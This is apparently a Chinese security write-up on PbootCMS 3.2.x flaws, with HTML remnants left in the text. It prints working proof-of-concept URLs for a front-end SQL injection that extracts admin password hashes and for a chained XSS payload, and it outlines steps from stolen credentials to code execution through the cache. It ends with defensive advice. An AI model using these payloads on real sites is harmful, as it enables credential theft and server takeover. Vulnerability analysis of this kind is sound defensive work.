PbootCMS 漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>

PbootCMS 存在一系列安全漏洞，包括：<\/p>

前台 SQL 注入漏洞<\/li>
基于 SQL 注入的 XSS 漏洞<\/li>

后台 RCE (远程代码执行) 漏洞<\/li> <\/ol>

影响版本：<\/p>

GitHub 最新版本 3.2.10<\/li>

Gitee 最新版本 3.2.5<\/li> <\/ul>

漏洞分析<\/h2>

1. 前台 SQL 注入漏洞<\/h3>

漏洞位置<\/strong>：apps\/home\/controller\/TagController.php<\/code><\/p>

漏洞成因<\/strong>：<\/p>

系统通过 get()<\/code> 函数传递 $_GET<\/code> 参数<\/li> 参数经过 escape_string<\/code> 函数处理<\/li> 在 parserPositionLabel<\/code> 处理时，tag 参数被添加到 content 中<\/li> 通过 parserListLabel<\/code> 的正则匹配和标签解析，最终构造出可注入的 SQL 语句<\/li> <\/ul> 关键点<\/strong>：<\/p> 通过闭合括号和注释符绕过过滤<\/li> 默认使用 SQLite 数据库<\/li> <\/ul> 2. XSS 漏洞<\/h3> 利用方式<\/strong>：<\/p> 基于 SQL 注入漏洞，通过 char()<\/code> 函数构造 XSS 载荷<\/li> SQLite 不支持 16 进制绕过，但提供了 char()<\/code> 函数<\/li> <\/ul> 3. 后台 RCE 漏洞<\/h3> 漏洞位置<\/strong>：core\/function\/handle.php<\/code><\/p> 漏洞成因<\/strong>：<\/p> decode_string<\/code> 函数进行 HTML 实体解码<\/li> 通过特定方式提交恶意数据可导致代码写入缓存文件<\/li> 访问首页时加载并执行恶意缓存文件<\/li> <\/ul> 漏洞利用<\/h2> SQL 注入 POC<\/h3> http:\/\/pbootcms.learn\/index.php?tag=ccc%3A%7Bpboot%3Alist%20filter%3D1%3D2)UNION%2F**%2FSELECT%2F**%2F1%2C2%2C3%2C4%2C5%2C(select%2F**%2Fpassword%2F**%2Ffrom%2F**%2Fay_user)%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2F**%2F--%2F**%2F%7C123%20scode%3D123%7D%5Blist%3Alink%20link%3Dasd%5D%7B%2Fpboot%3Alist%7D <\/code><\/pre> XSS POC<\/h3> http:\/\/pbootcms.learn\/index.php?tag=xxx%3A%7Bpboot%3Alist%20filter%3D1%3D2)UNION%2F**%2FSELECT%2F**%2F1%2C2%2C3%2C4%2C5%2C(select%2F**%2Fchar(34%2C62%2C60%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C60%2C34))%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2F**%2F--%2F**%2F%7C123%20scode%3D123%7D%5Blist%3Alink%20link%3Dasd%5D%7B%2Fpboot%3Alist%7D <\/code><\/pre> RCE 利用步骤<\/h3> 通过 SQL 注入获取管理员凭证<\/li> 登录后台<\/li> 通过特定方式提交恶意代码<\/li> 清理所有缓存<\/li> 访问首页触发恶意代码执行<\/li> <\/ol> 防御建议<\/h2> 对用户输入进行严格过滤和转义<\/li> 使用参数化查询防止 SQL 注入<\/li> 限制后台功能权限<\/li> 及时更新到修复版本<\/li> 对缓存文件进行安全检查<\/li> <\/ol> 技术细节<\/h2> SQL 注入构造<\/h3> 最终构造的 SQL 语句示例：<\/p> 1<\/span>=<\/span>2<\/span>)UNION<\/span>\/**\/<\/span>SELECT<\/span>\/**\/<\/span>1<\/span>,2<\/span>,3<\/span>,4<\/span>,5<\/span>,(select<\/span>\/**\/<\/span>password\/**\/<\/span>from<\/span>\/**\/<\/span>ay_user\/**\/<\/span>limit<\/span>\/**\/<\/span>0<\/span>,1<\/span>),7<\/span>,8<\/span>,9<\/span>,10<\/span>,11<\/span>,12<\/span>,13<\/span>,14<\/span>,15<\/span>,16<\/span>,17<\/span>,18<\/span>,19<\/span>,20<\/span>,21<\/span>,22<\/span>,23<\/span>,24<\/span>,25<\/span>,26<\/span>,27<\/span>,28<\/span>,29<\/span>\/<\/span>like<\/span> '%123%'<\/span>) ORDER<\/span> BY<\/span> a.istop DESC<\/span>,a.isrecommend DESC<\/span>,a.isheadline DESC<\/span>,a.sorting ASC<\/span>,a.date DESC<\/span>,a.id DESC<\/span> LIMIT<\/span> 15<\/span> OFFSET<\/span> 0<\/span> <\/span><\/span><\/code><\/pre>XSS 载荷构造<\/h3> 使用 SQLite 的 char()<\/code> 函数构造 XSS：<\/p> select<\/span> char(34<\/span>,62<\/span>,60<\/span>,115<\/span>,99<\/span>,114<\/span>,105<\/span>,112<\/span>,116<\/span>,62<\/span>,97<\/span>,108<\/span>,101<\/span>,114<\/span>,116<\/span>,40<\/span>,49<\/span>,41<\/span>,60<\/span>,47<\/span>,115<\/span>,99<\/span>,114<\/span>,105<\/span>,112<\/span>,116<\/span>,62<\/span>,60<\/span>,34<\/span>) <\/span><\/span><\/code><\/pre>解码后为："><script>alert(1)<\/script><"<\/code><\/p> 总结<\/h2> PbootCMS 的这一系列漏洞展示了从简单的注入到最终获取系统控制权的完整攻击链。开发人员应重视输入验证、输出编码和权限控制等基本安全原则，以防止此类漏洞的发生。<\/p>